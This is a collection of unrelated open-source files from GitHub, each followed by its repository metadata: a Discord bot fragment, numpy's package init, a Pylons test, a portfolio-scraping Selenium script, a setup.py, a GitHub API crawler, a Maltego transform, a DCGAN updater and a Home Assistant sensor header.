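    bot = commands.Bot(command_prefix='!', description='r2Bot music and chat commands')
    bot.add_cog(Music(bot))
    bot.add_cog(ChatBot(bot))
    # bot.run('YOUR_BOT_TOKEN')  # token intentionally left as a placeholder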
|
{
"content_hash": "5f8d33fc7dd9d688fb08d289ebb3e41f",
"timestamp": "",
"source": "github",
"line_count": 322,
"max_line_length": 181,
"avg_line_length": 37.015527950310556,
"alnum_prop": 0.5966943535531505,
"repo_name": "PWills2013/r2Bot",
"id": "efb122a3c9915e4746dd7eeaa53ab3cb2c2bccdb",
"size": "11919",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "voice.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "13510"
}
],
"symlink_target": ""
}
|
"""
NumPy
=====
Provides
1. An array object of arbitrary homogeneous items
2. Fast mathematical operations over arrays
3. Linear Algebra, Fourier Transforms, Random Number Generation
How to use the documentation
----------------------------
Documentation is available in two forms: docstrings provided
with the code, and a loose standing reference guide, available from
`the NumPy homepage <https://www.scipy.org>`_.
We recommend exploring the docstrings using
`IPython <https://ipython.org>`_, an advanced Python shell with
TAB-completion and introspection capabilities. See below for further
instructions.
The docstring examples assume that `numpy` has been imported as `np`::
>>> import numpy as np
Code snippets are indicated by three greater-than signs::
>>> x = 42
>>> x = x + 1
Use the built-in ``help`` function to view a function's docstring::
>>> help(np.sort)
... # doctest: +SKIP
For some objects, ``np.info(obj)`` may provide additional help. This is
particularly true if you see the line "Help on ufunc object:" at the top
of the help() page. Ufuncs are implemented in C, not Python, for speed.
The native Python help() does not know how to view their help, but our
np.info() function does.
To search for documents containing a keyword, do::
>>> np.lookfor('keyword')
... # doctest: +SKIP
General-purpose documents like a glossary and help on the basic concepts
of numpy are available under the ``doc`` sub-module::
>>> from numpy import doc
>>> help(doc)
... # doctest: +SKIP
Available subpackages
---------------------
doc
Topical documentation on broadcasting, indexing, etc.
lib
Basic functions used by several sub-packages.
random
Core Random Tools
linalg
Core Linear Algebra Tools
fft
Core FFT routines
polynomial
Polynomial tools
testing
NumPy testing tools
f2py
Fortran to Python Interface Generator.
distutils
Enhancements to distutils with support for
Fortran compilers support and more.
Utilities
---------
test
Run numpy unittests
show_config
Show numpy build configuration
dual
Overwrite certain functions with high-performance Scipy tools
matlib
Make everything matrices.
__version__
NumPy version string
Viewing documentation using IPython
-----------------------------------
Start IPython with the NumPy profile (``ipython -p numpy``), which will
import `numpy` under the alias `np`. Then, use the ``cpaste`` command to
paste examples into the shell. To see which functions are available in
`numpy`, type ``np.<TAB>`` (where ``<TAB>`` refers to the TAB key), or use
``np.*cos*?<ENTER>`` (where ``<ENTER>`` refers to the ENTER key) to narrow
down the list. To view the docstring for a function, use
``np.cos?<ENTER>`` (to view the docstring) and ``np.cos??<ENTER>`` (to view
the source code).
Copies vs. in-place operation
-----------------------------
Most of the functions in `numpy` return a copy of the array argument
(e.g., `np.sort`). In-place versions of these functions are often
available as array methods, i.e. ``x = np.array([1,2,3]); x.sort()``.
Exceptions to this rule are documented.
"""
from __future__ import division, absolute_import, print_function
import sys
import warnings
from ._globals import ModuleDeprecationWarning, VisibleDeprecationWarning
from ._globals import _NoValue
# We first need to detect if we're being called as part of the numpy setup
# procedure itself in a reliable manner.
try:
__NUMPY_SETUP__
except NameError:
__NUMPY_SETUP__ = False
if __NUMPY_SETUP__:
sys.stderr.write('Running from numpy source directory.\n')
else:
try:
from numpy.__config__ import show as show_config
except ImportError:
msg = """Error importing numpy: you should not try to import numpy from
its source directory; please exit the numpy source tree, and relaunch
your python interpreter from there."""
raise ImportError(msg)
from .version import git_revision as __git_revision__
from .version import version as __version__
__all__ = ['ModuleDeprecationWarning',
'VisibleDeprecationWarning']
# Allow distributors to run custom init code
from . import _distributor_init
from . import core
from .core import *
from . import compat
from . import lib
# FIXME: why have numpy.lib if everything is imported here??
from .lib import *
from . import linalg
from . import fft
from . import polynomial
from . import random
from . import ctypeslib
from . import ma
from . import matrixlib as _mat
from .matrixlib import *
from .compat import long
# Make these accessible from numpy name-space
# but not imported in from numpy import *
# TODO[gh-6103]: Deprecate these
if sys.version_info[0] >= 3:
from builtins import bool, int, float, complex, object, str
unicode = str
else:
from __builtin__ import bool, int, float, complex, object, unicode, str
from .core import round, abs, max, min
# now that numpy modules are imported, can initialize limits
core.getlimits._register_known_types()
__all__.extend(['__version__', 'show_config'])
__all__.extend(core.__all__)
__all__.extend(_mat.__all__)
__all__.extend(lib.__all__)
__all__.extend(['linalg', 'fft', 'random', 'ctypeslib', 'ma'])
# These are added by `from .core import *` and `core.__all__`, but we
# overwrite them above with builtins we do _not_ want to export.
__all__.remove('long')
__all__.remove('unicode')
# Remove things that are in the numpy.lib but not in the numpy namespace
# Note that there is a test (numpy/tests/test_public_api.py:test_numpy_namespace)
# that prevents adding more things to the main namespace by accident.
# The list below will grow until the `from .lib import *` fixme above is
# taken care of
__all__.remove('Arrayterator')
del Arrayterator
# Filter out Cython harmless warnings
warnings.filterwarnings("ignore", message="numpy.dtype size changed")
warnings.filterwarnings("ignore", message="numpy.ufunc size changed")
warnings.filterwarnings("ignore", message="numpy.ndarray size changed")
# oldnumeric and numarray were removed in 1.9. In case some packages import
# but do not use them, we define them here for backward compatibility.
oldnumeric = 'removed'
numarray = 'removed'
if sys.version_info[:2] >= (3, 7):
# Importing Tester requires importing all of UnitTest which is not a
    # cheap import. Since it is mainly used in test suites, we lazy import it
# here to save on the order of 10 ms of import time for most users
#
# The previous way Tester was imported also had a side effect of adding
# the full `numpy.testing` namespace
#
# module level getattr is only supported in 3.7 onwards
# https://www.python.org/dev/peps/pep-0562/
def __getattr__(attr):
if attr == 'testing':
import numpy.testing as testing
return testing
elif attr == 'Tester':
from .testing import Tester
return Tester
else:
raise AttributeError("module {!r} has no attribute "
"{!r}".format(__name__, attr))
def __dir__():
return list(globals().keys()) + ['Tester', 'testing']
else:
# We don't actually use this ourselves anymore, but I'm not 100% sure that
# no-one else in the world is using it (though I hope not)
from .testing import Tester
# Pytest testing
from numpy._pytesttester import PytestTester
test = PytestTester(__name__)
del PytestTester
def _sanity_check():
"""
Quick sanity checks for common bugs caused by environment.
There are some cases e.g. with wrong BLAS ABI that cause wrong
results under specific runtime conditions that are not necessarily
achieved during test suite runs, and it is useful to catch those early.
See https://github.com/numpy/numpy/issues/8577 and other
similar bug reports.
"""
try:
x = ones(2, dtype=float32)
if not abs(x.dot(x) - 2.0) < 1e-5:
raise AssertionError()
except AssertionError:
msg = ("The current Numpy installation ({!r}) fails to "
"pass simple sanity checks. This can be caused for example "
"by incorrect BLAS library being linked in, or by mixing "
"package managers (pip, conda, apt, ...). Search closed "
"numpy issues for similar problems.")
raise RuntimeError(msg.format(__file__))
_sanity_check()
del _sanity_check
|
{
"content_hash": "8843aa6a8430dd74e41f929aef5a1191",
"timestamp": "",
"source": "github",
"line_count": 260,
"max_line_length": 85,
"avg_line_length": 34.06923076923077,
"alnum_prop": 0.6551140212237525,
"repo_name": "jorisvandenbossche/numpy",
"id": "349914b2f3a776b41b99eeada73fbf24e933eadd",
"size": "8858",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "numpy/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "9068647"
},
{
"name": "C++",
"bytes": "189527"
},
{
"name": "Fortran",
"bytes": "10884"
},
{
"name": "JavaScript",
"bytes": "16928"
},
{
"name": "Makefile",
"bytes": "4290"
},
{
"name": "Python",
"bytes": "8307898"
},
{
"name": "Shell",
"bytes": "8482"
},
{
"name": "sed",
"bytes": "5741"
}
],
"symlink_target": ""
}
|
import warnings
from unittest import TestCase
from paste.fixture import TestApp
from paste.httpexceptions import HTTPMovedPermanently
from paste.registry import RegistryManager
import pylons
from pylons.controllers import WSGIController
from pylons.controllers.util import etag_cache
from pylons.decorators import jsonify as orig_jsonify
from pylons.util import ContextObj
from __init__ import ControllerWrap, SetupCacheGlobal, TestWSGIController
class SimpleTestWSGIController(TestWSGIController):
wsgi_app = None
def __init__(self, *args, **kargs):
TestWSGIController.__init__(self, *args, **kargs)
self.baseenviron = {}
app = ControllerWrap(self.wsgi_app)
app = self.sap = SetupCacheGlobal(app, self.baseenviron)
app = RegistryManager(app)
self.app = TestApp(app)
def setUp(self):
TestWSGIController.setUp(self)
self.baseenviron.update(self.environ)
class HelpersController(WSGIController):
def test_etag_cache(self):
etag_cache('test')
return "from etag_cache"
class TestHelpers(SimpleTestWSGIController):
wsgi_app = HelpersController
def setUp(self):
SimpleTestWSGIController.setUp(self)
warnings.simplefilter('error', DeprecationWarning)
def tearDown(self):
SimpleTestWSGIController.tearDown(self)
warnings.simplefilter('always', DeprecationWarning)
def test_return_etag_cache(self):
self.baseenviron['pylons.routes_dict']['action'] = 'test_etag_cache'
response = self.app.get('/')
assert '"test"' == response.header('Etag')
assert 'from etag_cache' in response
|
{
"content_hash": "31601af894bce1e3ee3c0062d231aaa6",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 76,
"avg_line_length": 31.49056603773585,
"alnum_prop": 0.7082085080886759,
"repo_name": "obeattie/pylons",
"id": "9efb5e065f07a8668431e5359029d8edc7f5b7fb",
"size": "1669",
"binary": false,
"copies": "1",
"ref": "refs/heads/trunk",
"path": "tests/test_units/test_helpers.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "5828"
},
{
"name": "Python",
"bytes": "326918"
}
],
"symlink_target": ""
}
|
import os
import re
import json
import time
import pdb
from pyquery import PyQuery as pq
import lxml.html
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
UA_STRING = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36"
DEBUG = True
DEBUG_READ = True
def log(s,log_type="INFO"):
if DEBUG:
print(log_type+":"+s)
def WaitFor(driver, strByType, strIdentifier, timeout =10):
try:
el = WebDriverWait(driver, timeout).until(
EC.presence_of_element_located((strByType, strIdentifier))
)
except:
el = None
if el:
log("Found item:"+strByType+":"+strIdentifier)
else:
log("Not Found item:"+strByType+":"+strIdentifier,"WARN")
return(el)
def cleanup_data(vr=None):
if DEBUG_READ and not vr:
vr = json.loads(open("valueresearch_portfolio.json","r").read())
# vr["stocks_raw"] = lstStock
# vr["mfs_raw"] = lstMF
# vr["stock_subtotal_raw"] = lststockSubTotal
# vr["MF_subtotal_raw"] = lstmfSubTotal
# vr["summary_raw"] = lstsummary
lstCategory = []
# summaryvalue
d = {
"totalvalue":vr["summary_raw"][0],
"onedaychngamt":vr["summary_raw"][1].split(r"|")[0].strip(),
"onedaychngpert":vr["summary_raw"][1].split(r"|")[1].strip(),
"totalgrowthamt":vr["summary_raw"][2].split(r"|")[0].strip(),
"totalgrowthpert":vr["summary_raw"][2].split(r"|")[1].strip(),
}
vr['summaryvalue'] = d
lstCategory = []
# stocksubtotal
d = {
"investedamt":vr["stock_subtotal_raw"][7],
"latestamt":vr["stock_subtotal_raw"][10],
"onedaychngamt":"",
"onedaychngpert":"",
"returnamt":"",
"returnpert":"",
}
vr['stocksubtotal'] = d
# mfsubtotal
d = {
"investedamt":vr["MF_subtotal_raw"][7],
"latestamt":vr["MF_subtotal_raw"][10],
"onedaychngamt":"",
"onedaychngpert":"",
"returnamt":"",
"returnpert":"",
}
vr['mfssubtotal'] = d
# stock
lstCategory = []
for i in vr["stocks_raw"]:
lstCategory.append({
"title":i[0].split("\u00a0")[0],
"portpert":i[2],
"latestnav":i[3].split(" ")[0],
"navdate":i[3].split(" ")[1],
"onedaychngamt":i[5],
"onedaychngpert":i[6],
"investamt":i[8],
"costnav":i[9],
"latestvalue":i[11],
"units":i[12],
"returnabs":i[14],
"returnpertpa":i[15]
})
vr['stock'] = lstCategory
lstCategory = []
# mfs
lstCategory = []
for i in vr["mfs_raw"]:
lstCategory.append({
"title":i[0].split("\u00a0")[0],
"portpert":i[2],
"latestnav":i[3].split(" ")[0],
"navdate":i[3].split(" ")[1],
"onedaychngamt":i[5],
"onedaychngpert":i[6],
"investamt":i[8],
"costnav":i[9],
"latestvalue":i[11],
"units":i[12],
"returnabs":i[14],
"returnpertpa":i[15]
})
vr['mfs'] = lstCategory
lstCategory = []
del vr["stocks_raw"]
del vr["mfs_raw"]
del vr["stock_subtotal_raw"]
del vr["MF_subtotal_raw"]
del vr["summary_raw"]
return vr
def get_portfolio(email,passwd, drivertype, driver_path=''):
if drivertype == "Chrome":
        if driver_path == '':
raise Exception("Driverpath cannot be blank for Chrome")
from selenium.webdriver.chrome.options import Options
opts = Options()
opts.add_argument("user-agent="+UA_STRING)
# disable images
prefs = {"profile.managed_default_content_settings.images":2}
opts.add_experimental_option("prefs",prefs)
driver = webdriver.Chrome(driver_path,chrome_options=opts)
elif drivertype == "PhantomJS":
dcap = dict(DesiredCapabilities.PHANTOMJS)
dcap["phantomjs.page.settings.userAgent"] = (UA_STRING)
driver = webdriver.PhantomJS(desired_capabilities=dcap)
else:
raise Exception("Invalid Driver Type:" + drivertype)
driver.set_window_size(1366, 680)
    vr = {}
    vr['error'] = []
    vr['warn'] = []  # warnings are appended here (e.g. missing 'Skip' link)
    # vr['portfolio'] = []
    # vr['portfolio_raw'] = []
driver.get("https://www.valueresearchonline.com/")
linkSkipAdlanding = WaitFor(driver, By.LINK_TEXT, "Go directly to Value Research Online")
if linkSkipAdlanding:
linkSkipAdlanding.click()
else:
vr['warn'].append("'Skip' link not found")
btnNoThanks = WaitFor(driver, By.CSS_SELECTOR, "#noThanks")
if btnNoThanks:
btnNoThanks.click()
else:
vr['error'].append("'No Thanks' button not found")
linkSignin = WaitFor(driver, By.CSS_SELECTOR, "a.btnsignin")
if linkSignin:
linkSignin.click()
else:
vr['error'].append("Login link not found")
inputboxUsername = WaitFor(driver, By.CSS_SELECTOR, "input#username")
if inputboxUsername:
inputboxUsername.send_keys(email)
else:
vr['error'].append("Username Field not found/Not in Signin Page")
inputboxPasswd = WaitFor(driver, By.CSS_SELECTOR, "input#password")
if inputboxPasswd:
inputboxPasswd.send_keys(passwd)
btnSubmit = WaitFor(driver, By.CSS_SELECTOR, "input#submitbtn")
if btnSubmit:
btnSubmit.click()
if DEBUG:
log("Logging in..")
lblLoginConf = WaitFor(driver, By.CSS_SELECTOR, "span#headerLoginText")
if lblLoginConf:
log("You are now logged in")
else:
vr['error'].append("Login Failed")
else:
vr['error'].append("Submit Button not found")
linkPortfolio = WaitFor(driver, By.CSS_SELECTOR, "a[href='/port/']")
if linkPortfolio:
linkPortfolio.click()
lblPortfolioPage = WaitFor(driver, By.CSS_SELECTOR, "div.Portfolio-summary-head")
if not lblPortfolioPage:
return(vr)
tblSnapsht = WaitFor(driver, By.CSS_SELECTOR, "table#snapshot_tbl")
if tblSnapsht:
re_pattern_summary = re.compile("(?:PORTFOLIO VALUE IN R)|(?:VALUE CHANGE TODAY IN R)|(?:TOTAL GAIN IN R \| % PA)|(?:[ ]+)")
re_pattern_stocks = re.compile("(?:[ ]+)")
re_pattern_mfs = re.compile("(?:[ ]+)")
WaitFor(driver, By.CSS_SELECTOR, "table#snapshot_tbl tbody.trData")
tblStock, tblMF = driver.find_elements_by_css_selector("table#snapshot_tbl tbody.trData")
tblStockSubTotal, tblMFSubTotal = driver.find_elements_by_css_selector("table#snapshot_tbl tbody.subtotal")
tblSummary = driver.find_elements_by_css_selector("table.Portfolio-summary tr")[1]
# print(tblMFSubTotal.get_attribute('innerHTML'))
# print(tblSummary.get_attribute('innerHTML'))
rowsStock = [i for i in pq(tblStock.get_attribute('innerHTML'))('tr:not(.soldHoldings)')]
rowsMF = [i for i in pq(tblMF.get_attribute('innerHTML'))('tr:not(.soldHoldings)')]
lstStock = []
lstMF = []
for row in rowsStock:
lstStock.append([re.sub(re_pattern_stocks," ",str(i.text_content())).strip() for i in pq(lxml.html.tostring(row))('td') ])
for row in rowsMF:
lstMF.append([re.sub(re_pattern_mfs," ",str(i.text_content())).strip() for i in pq(lxml.html.tostring(row))('td') ])
lststockSubTotal = [i.text_content() for i in pq(tblStockSubTotal.get_attribute('innerHTML'))('tr.NotImportHoldings td') ]
lstmfSubTotal = [i.text_content() for i in pq(tblMFSubTotal.get_attribute('innerHTML'))('tr td') ]
lstsummary = [re.sub(re_pattern_summary," ",str(i.text_content())).strip() for i in pq(tblSummary.get_attribute('innerHTML'))('td') ]
vr["stocks_raw"] = lstStock
vr["mfs_raw"] = lstMF
vr["stock_subtotal_raw"] = lststockSubTotal
vr["MF_subtotal_raw"] = lstmfSubTotal
vr["summary_raw"] = lstsummary
else:
raise Exception("Portfolio table not found!")
if DEBUG:
open("valueresearch_portfolio.json","w").write(json.dumps(vr))
vr = cleanup_data(vr)
if DEBUG:
open("valueresearch_portfolio_clean.json","w").write(json.dumps(vr))
return(vr)
if __name__ == "__main__":
import os
dir_path = os.path.dirname(os.path.realpath(__file__))
orders = get_portfolio(os.environ['VR_username'],os.environ['VR_passwd'],"Chrome",dir_path+os.path.sep+r"chromedriver\chromedriver.exe")
# vr = cleanup_data()
# open("valueresearch_portfolio_clean.json","w").write(json.dumps(vr))
|
{
"content_hash": "f0980cf7af2fbfe0aed482bcf8ac80a7",
"timestamp": "",
"source": "github",
"line_count": 255,
"max_line_length": 147,
"avg_line_length": 35.384313725490195,
"alnum_prop": 0.5865011636927852,
"repo_name": "pradyumnac/valueresearch",
"id": "1e7370adf560d8dff433bab489873d80e577a256",
"size": "9023",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "vr.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "58"
},
{
"name": "Python",
"bytes": "16236"
}
],
"symlink_target": ""
}
|
"""This file is for distribute properimage
"""
# =============================================================================
# IMPORTS
# =============================================================================
import sys
import os
import setuptools
from ez_setup import use_setuptools
use_setuptools()
# =============================================================================
# PATH TO THIS MODULE
# =============================================================================
PATH = os.path.abspath(os.path.dirname(__file__))
# =============================================================================
# Get the version from properimage file itself (not imported)
# =============================================================================
PROPERIMAGE_INIT_PATH = os.path.join(PATH, "properimage", "__init__.py")
with open(PROPERIMAGE_INIT_PATH, "r") as f:
for line in f:
if line.startswith("__version__"):
_, _, PI_VERSION = line.replace('"', "").split()
break
# =============================================================================
# CONSTANTS
# =============================================================================
REQUIREMENTS = [
"numpy >= 1.13.2",
"scipy >= 1.0",
"astropy >= 2.0",
"matplotlib",
"sep",
"astroscrappy>=1.0.5",
"astroalign>=1.0.3",
"tinynpydb>=0.1",
"pyFFTW>=0.12",
# "pytest>=3.6.2",
]
# =============================================================================
# DESCRIPTION
# =============================================================================
with open("README.md") as fp:
LONG_DESCRIPTION = fp.read()
# =============================================================================
# FUNCTIONS
# =============================================================================
print(setuptools.find_packages()) # exclude=['test*']
def do_setup():
setuptools.setup(
name="properimage",
version=PI_VERSION,
description="Proper Astronomic Image Analysis",
long_description=LONG_DESCRIPTION,
long_description_content_type="text/markdown",
author="Bruno Sanchez",
author_email="bruno@oac.unc.edu.ar",
url="https://github.com/toros-astro/ProperImage",
py_modules=["ez_setup"],
license="BSD 3",
keywords="astronomy image",
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Education",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: Implementation :: CPython",
"Topic :: Scientific/Engineering",
],
packages=setuptools.find_packages(), # exclude=['test*']),
install_requires=REQUIREMENTS,
)
def do_publish():
pass
if __name__ == "__main__":
if sys.argv[-1] == "publish":
do_publish()
else:
do_setup()
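# Usage sketch: "python setup.py sdist bdist_wheel" (or any regular setuptools
# command) is handled by do_setup(); "python setup.py publish" is routed to the
# currently empty do_publish() hook instead.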
|
{
"content_hash": "2387e6105049b19684d14ba4eb701bf6",
"timestamp": "",
"source": "github",
"line_count": 105,
"max_line_length": 79,
"avg_line_length": 31.39047619047619,
"alnum_prop": 0.4098907766990291,
"repo_name": "toros-astro/ProperImage",
"id": "660fdbaf2d9c33a0fc7d067dba47b0064cf645c6",
"size": "3512",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "207836"
}
],
"symlink_target": ""
}
|
import requests
import json
import time
import os
import urllib2
import random
from sqlalchemy import create_engine
from sqlalchemy import MetaData, Column, Table, ForeignKey
from sqlalchemy import Integer, String, DateTime
from sqlalchemy import func
from sqlalchemy.orm import sessionmaker
from config import *
engine = create_engine('mysql://'+db_username+'@'+db_host+':'+str(db_port)+'/'+db_database, echo=False)
metadata = MetaData(bind=engine)
Session = sessionmaker(bind=engine)
db_session = Session()
repository_table = Table('repository', metadata,
Column('id', Integer, primary_key=True),
Column('name', String(60)),
Column('forks', Integer),
Column('open_issues', Integer),
Column('watchers', Integer),
mysql_engine='InnoDB',
)
issue_table = Table('issue', metadata,
Column('id', Integer, autoincrement=True, primary_key=True),
Column('repository_id', Integer, ForeignKey('repository.id')),
Column('creator', String(60)),
Column('number', Integer),
Column('open_date', DateTime),
Column('close_date', DateTime),
mysql_engine='InnoDB',
)
commit_table = Table('commit', metadata,
Column('id', Integer, autoincrement=True, primary_key=True),
Column('repository_id', Integer, ForeignKey('repository.id')),
Column('committer', String(60)),
mysql_engine='InnoDB'
)
# create tables in database
metadata.create_all()
session = requests.Session()
session.auth = (github_username, github_password)
# Get some random words (from https://gist.github.com/duncannz/4669395)
response = urllib2.urlopen('https://gist.github.com/duncannz/4669395/raw/3f9b27fe0e33326e0cedca7472a9d55855a747bc/words.txt')
random_words = response.readlines()
def _get_user_organizations(user):
response = session.get('https://api.github.com/users/'+user+"/orgs")
_check_quota(response)
if(response.ok):
orgs = json.loads(response.text or response.content)
return [org['login'] for org in orgs]
# pick a radom repository by searching with a random keyword
def _get_random_repo():
while True:
keyword = random.choice(random_words)
response = session.get('https://api.github.com/legacy/repos/search/'+keyword)
_check_quota(response)
if(response.ok):
repos = json.loads(response.text or response.content)
if(len(repos['repositories']) > 0):
repo = random.choice(repos['repositories'])
userame = repo['username']
orgs = _get_user_organizations(userame)
for org in orgs:
response = session.get('https://api.github.com/users/'+org+'/repos')
_check_quota(response)
if(response.ok):
repos = json.loads(response.text or response.content)
return random.choice(repos)
def _check_quota(response):
requests_left = int(response.headers['X-RateLimit-Remaining'])
if(requests_left == 0):
print "Sleeping for 65 minutes... Good Night."
time.sleep(65 * 60)
if requests_left % 10 == 0: print "Requests Left: " + str(requests_left)
# crawl around and gather data until the target sample size is reached
def crawl(sample_size):
while(sample_size > db_session.query(repository_table).count()):
try:
repo = _get_random_repo();
i = repository_table.insert([repo])
i.execute()
url = 'https://api.github.com/repos/'+repo['full_name']+'/commits?per_page=100'
while url is not None:
response = session.get(url)
_check_quota(response)
if(response.ok):
commits = json.loads(response.text or response.content)
for commit in commits:
committer = None
if 'author' in commit and commit['author'] is not None:
committer = commit['author']['login']
else:
committer = commit['commit']['author']['name'].encode('unicode_escape')
i = commit_table.insert(
dict(
repository_id=repo['id'],
committer=committer))
i.execute()
links = response.links
if 'next' in links:
url = response.links["next"]['url']
else:
url = None
else:
url = None
for tag in ['closed', 'open']:
url = 'https://api.github.com/repos/'+repo['full_name']+'/issues?per_page=100&state='+tag
while url is not None:
response = session.get(url)
_check_quota(response)
if(response.ok):
issues = json.loads(response.text or response.content)
for issue in issues:
i = issue_table.insert(
dict(
number=issue['number'],
repository_id=repo['id'],
creator=issue['user']['login'],
open_date=issue['created_at'],
close_date=issue['closed_at']))
i.execute()
links = response.links
if 'next' in links:
url = response.links["next"]['url']
else:
url = None
else:
url = None
sample_size -= 1
except Exception as e:
print e
crawl(5000)
|
{
"content_hash": "9c0fb924856c90cd00daf47009b7dc34",
"timestamp": "",
"source": "github",
"line_count": 153,
"max_line_length": 125,
"avg_line_length": 33.248366013071895,
"alnum_prop": 0.6264989188126597,
"repo_name": "kevinpeterson/github-process-research",
"id": "02f86bfdf4778e5c202f34c278f8ee90b44d078c",
"size": "5354",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "code/research.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "12801"
},
{
"name": "Shell",
"bytes": "230"
},
{
"name": "TeX",
"bytes": "49898"
}
],
"symlink_target": ""
}
|
import Tkinter, tkFileDialog
import json
import csv
from canari.maltego.utils import debug, progress
from canari.framework import configure #, superuser
from common.entities import RFCSV, RFEvent
from common.APIUtil import APIUtil
__author__ = 'Filip Reesalu'
__copyright__ = 'Copyright 2014, Recorded Future'
__credits__ = []
__license__ = 'Apache'
__version__ = '1.0'
__maintainer__ = 'Christian Heinrich'
__email__ = 'christian.heinrich@cmlh.id.au'
__status__ = 'Production'
__all__ = [
'dotransform',
'onterminate'
]
@configure(
label='Import CSV File [Recorded Future]',
description='http://support.recordedfuture.com/knowledgebase/articles/164320-csv-export-explained',
uuids=[ 'recfut.RFImportCSV' ],
inputs=[ ( 'Recorded Future', RFCSV ) ],
debug=False
)
def dotransform(request, response):
# Report transform progress
progress(50)
# Send a debugging message to the Maltego UI console
debug('Maltego Input Entity Value: %s' % request.value)
name = request.value
debug('name: %s' % name)
root = Tkinter.Tk()
root.lift()
root.withdraw()
    csvfilename = tkFileDialog.askopenfilename()
    if not csvfilename:
        # Abort the transform if the user cancelled the file dialog.
        raise ValueError('No CSV file was selected')
data = csv.DictReader(open(csvfilename), delimiter=',',fieldnames=('Event Id','Event Type','Event Title','Start Time','End Time','Precision','Count','First Published Time','Last Published Time','Sample Fragment','Entities','Locations','Source Count','Positive Sentiment','Negative Sentiment'))
next(data)
for row in data:
event = row['Event Type']+"-"+row['Event Id']
e = RFEvent('%s' % event)
e.eid = row['Event Id']
e.etype = row['Event Type']
e.title = row['Event Title']
e.starttime = row['Start Time']
e.stoptime = row['End Time']
e.fragment = row['Sample Fragment']
e.precision = row['Precision']
e.count = row['Count']
e.firstpublished = row['First Published Time']
e.lastpublished = row['Last Published Time']
e.sourcecount = row['Source Count']
e.possentiment = row['Positive Sentiment']
e.negsentiment = row['Negative Sentiment']
# Add entity to response object
response += e
# Update progress
progress(100)
# Return response for visualization
return response
def onterminate():
debug('Caught signal... exiting.')
exit(0)
|
{
"content_hash": "a9dd933c892f97c02cf760f0aadd9e1d",
"timestamp": "",
"source": "github",
"line_count": 82,
"max_line_length": 297,
"avg_line_length": 29.951219512195124,
"alnum_prop": 0.6445439739413681,
"repo_name": "cmlh/Maltego-Recorded_Future",
"id": "cc4fd2c5486b135ebc54a5ac5a9e453a6a3be4a1",
"size": "2479",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "debian-dpkg/maltego-recordedfuture-1.1rc1/opt/maltego-recordedfuture/bin/canari/recordedfuturecanari/src/recordedfuturecanari/transforms/rf_csv_maltegoload.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Perl",
"bytes": "1201"
},
{
"name": "Python",
"bytes": "46218"
},
{
"name": "Shell",
"bytes": "599"
}
],
"symlink_target": ""
}
|
from __future__ import print_function
import chainer
import chainer.functions as F
from chainer import Variable
class DCGANUpdater(chainer.training.StandardUpdater):
def __init__(self, *args, **kwargs):
self.gen, self.dis = kwargs.pop('models')
super(DCGANUpdater, self).__init__(*args, **kwargs)
def loss_dis(self, dis, y_fake, y_real):
batchsize = len(y_fake)
L1 = F.sum(F.softplus(-y_real)) / batchsize
L2 = F.sum(F.softplus(y_fake)) / batchsize
loss = L1 + L2
chainer.report({'loss': loss}, dis)
return loss
def loss_gen(self, gen, y_fake):
batchsize = len(y_fake)
loss = F.sum(F.softplus(-y_fake)) / batchsize
chainer.report({'loss': loss}, gen)
return loss
def update_core(self):
gen_optimizer = self.get_optimizer('gen')
dis_optimizer = self.get_optimizer('dis')
batch = self.get_iterator('main').next()
x_real = Variable(self.converter(batch, self.device)) / 255.
xp = chainer.cuda.get_array_module(x_real.data)
gen, dis = self.gen, self.dis
batchsize = len(batch)
y_real = dis(x_real)
z = Variable(xp.asarray(gen.make_hidden(batchsize)))
x_fake = gen(z)
y_fake = dis(x_fake)
dis_optimizer.update(self.loss_dis, dis, y_fake, y_real)
gen_optimizer.update(self.loss_gen, gen, y_fake)
|
{
"content_hash": "fd123c184ad5ed0356b8f7f4180d8f68",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 68,
"avg_line_length": 30.82608695652174,
"alnum_prop": 0.5994358251057827,
"repo_name": "ysekky/chainer",
"id": "b9fda48ab2fb36fb02875dafb92a96de14e3e92d",
"size": "1441",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "examples/dcgan/updater.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Python",
"bytes": "2598837"
}
],
"symlink_target": ""
}
|
"""Weather information for air and road temperature (by Trafikverket)."""
import asyncio
from datetime import timedelta
import logging
import aiohttp
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
ATTR_ATTRIBUTION, CONF_API_KEY, CONF_MONITORED_CONDITIONS,
CONF_NAME, DEVICE_CLASS_HUMIDITY, DEVICE_CLASS_TEMPERATURE, TEMP_CELSIUS)
from homeassistant.helpers.aiohttp_client import async_get_clientsession
import homeassistant.helpers.config_validation as cv
